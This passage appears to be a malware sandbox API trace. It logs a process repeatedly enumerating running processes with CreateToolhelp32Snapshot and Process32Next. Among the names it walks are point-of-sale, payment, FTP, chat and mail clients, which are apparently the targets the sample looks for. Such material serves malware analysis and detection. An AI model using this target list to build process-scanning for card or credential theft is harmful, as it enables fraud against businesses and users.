th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.854] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.856] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.859] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.861] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.863] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.865] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.897] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.900] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.903] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.906] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.909] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.911] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.914] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.917] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.920] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.923] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.926] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.928] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xab0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.931] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.933] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.946] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.948] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="language-want.exe")) returned 1 [0096.951] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_sure_still.exe")) returned 1 [0096.953] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="store.exe")) returned 1 [0096.957] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bookstyleactually.exe")) returned 1 [0096.959] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="movie.exe")) returned 1 [0096.962] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.964] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.966] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0096.968] CloseHandle (hObject=0x1500) returned 1 [0096.968] Sleep (dwMilliseconds=0x64) [0097.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1500 [0097.088] Process32First (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.090] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.092] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.095] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.097] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.099] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.102] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.104] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.107] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.110] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0097.112] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.114] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.118] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.120] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.123] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.126] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.128] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.131] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.134] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.136] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.138] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0097.140] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.142] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0097.145] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0097.147] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.149] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.151] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.155] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.157] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.160] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rule_night.exe")) returned 1 [0097.162] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="lawyercheckpractice.exe")) returned 1 [0097.164] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="move.exe")) returned 1 [0097.166] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="propertystep.exe")) returned 1 [0097.170] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0097.171] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="deep.exe")) returned 1 [0097.173] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="candidate-coach.exe")) returned 1 [0097.176] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="central rule.exe")) returned 1 [0097.177] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="stage.exe")) returned 1 [0097.180] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="which.exe")) returned 1 [0097.182] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="could team.exe")) returned 1 [0097.184] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="special avoid share.exe")) returned 1 [0097.186] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="collection.exe")) returned 1 [0097.188] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="none.exe")) returned 1 [0097.190] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="perform.exe")) returned 1 [0097.191] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.193] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.195] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.198] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.201] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.203] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.205] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.207] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.209] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.211] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: 